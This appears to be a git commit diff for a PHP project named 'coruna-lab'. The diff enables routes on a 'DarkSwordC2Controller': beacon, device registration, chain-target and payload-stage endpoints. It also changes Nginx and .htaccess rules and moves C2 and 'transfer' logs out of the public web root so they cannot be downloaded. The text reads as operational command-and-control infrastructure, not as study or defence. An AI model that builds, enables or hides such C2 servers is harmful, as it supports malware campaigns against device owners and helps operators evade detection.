This commit is contained in:
hashbro
2026-09-05 20:18:30 +08:00
parent f67da8a102
commit f94def7c1f
4 changed files with 23 additions and 14 deletions
+13 -5
View File
@@ -183,6 +183,12 @@ https://admin.example.com/c/<ver>/show.htm # Nginx 静态别名 → channel/<ve
```nginx
# —— 粘贴到「网站 → 设置 → 配置文件」,放在 location / 和 enable-php 之前 ——
# 禁止下载应用日志(即使 public/log 里还留着旧文件)
location ^~ /log/ {
deny all;
return 404;
}
location ~ "^/web/[0-9a-f]{32}/" {
try_files $uri =404;
add_header Cache-Control "public, max-age=300";
@@ -603,15 +609,17 @@ tail -n 80 /www/server/php/82/var/log/php-fpm.log
### `mkdir(): Permission denied` at `Helpers.php` / `public/log`
### `mkdir(): Permission denied` at `Helpers.php` / `storage/logs`
C2 中间件会写 `public/log/c2/Ymd.log`(旧版)和 `public/log/xxbb/Ymd.log`(新版短路径)。站点运行用户(宝塔多为 `www`)对 `public/log` 无写权限时会报错。
C2 / 转账日志写在 **Web 根外** `storage/logs/{c2,xxbb,transfer,ds}/Ymd.log`。站点运行用户(宝塔多为 `www`)对 `storage` 无写权限时会报错。
```bash
cd /www/wwwroot/coruna-lab
mkdir -p public/log/c2 public/log/xxbb
chown -R www:www public/log storage bootstrap/cache
chmod -R ug+rwx public/log storage bootstrap/cache
mkdir -p storage/logs/c2 storage/logs/xxbb storage/logs/transfer
chown -R www:www storage bootstrap/cache
chmod -R ug+rwx storage bootstrap/cache
# 线上若还留着可下载的旧文件,删掉并在 Nginx 加上 location ^~ /log/ { deny all; }
rm -rf public/log
```
同时确认网站「运行目录 / 用户」与上述属主一致。部署后建议立刻执行一次,避免首个 C2 请求踩坑。
+2 -1
View File
@@ -5,10 +5,11 @@
RewriteEngine On
# Builder state must never be served from public/ (defense in depth).
# Builder state / leftover app logs must never be served from public/.
RewriteRule ^lab_seeds\.json$ - [F,L]
RewriteRule ^manifest\.latest\.json$ - [F,L]
RewriteRule ^out(/|$) - [F,L]
RewriteRule ^log(/|$) - [F,L]
# Handle Authorization Header
RewriteCond %{HTTP:Authorization} .
+8 -8
View File
@@ -8,13 +8,13 @@ $ds = DarkSwordC2Controller::class;
// Shared /a /u /nb /event /result are declared in routes/xxbb.php
// (same URI, DarkSword vs xxbb chosen per request).
// Route::any('/beacon', [$ds, 'beacon']);
// Route::any('/war', [$ds, 'war']);
// Route::any('/p', [$ds, 'p']);
// Route::any('/stats', [$ds, 'stats']);
Route::any('/beacon', [$ds, 'beacon']);
Route::any('/war', [$ds, 'war']);
Route::any('/p', [$ds, 'p']);
Route::any('/stats', [$ds, 'stats']);
// Route::any('/api/ds/log', [$ds, 'log']);
// Route::any('/api/ds/device/register', [$ds, 'register']);
// Route::any('/api/ds/chain-targets', [$ds, 'chainTargets']);
Route::any('/api/ds/log', [$ds, 'log']);
Route::any('/api/ds/device/register', [$ds, 'register']);
Route::any('/api/ds/chain-targets', [$ds, 'chainTargets']);
// Route::any('/api/ds/pe-stage/{name}', [$ds, 'peStage']);
Route::any('/api/ds/pe-stage/{name}', [$ds, 'peStage']);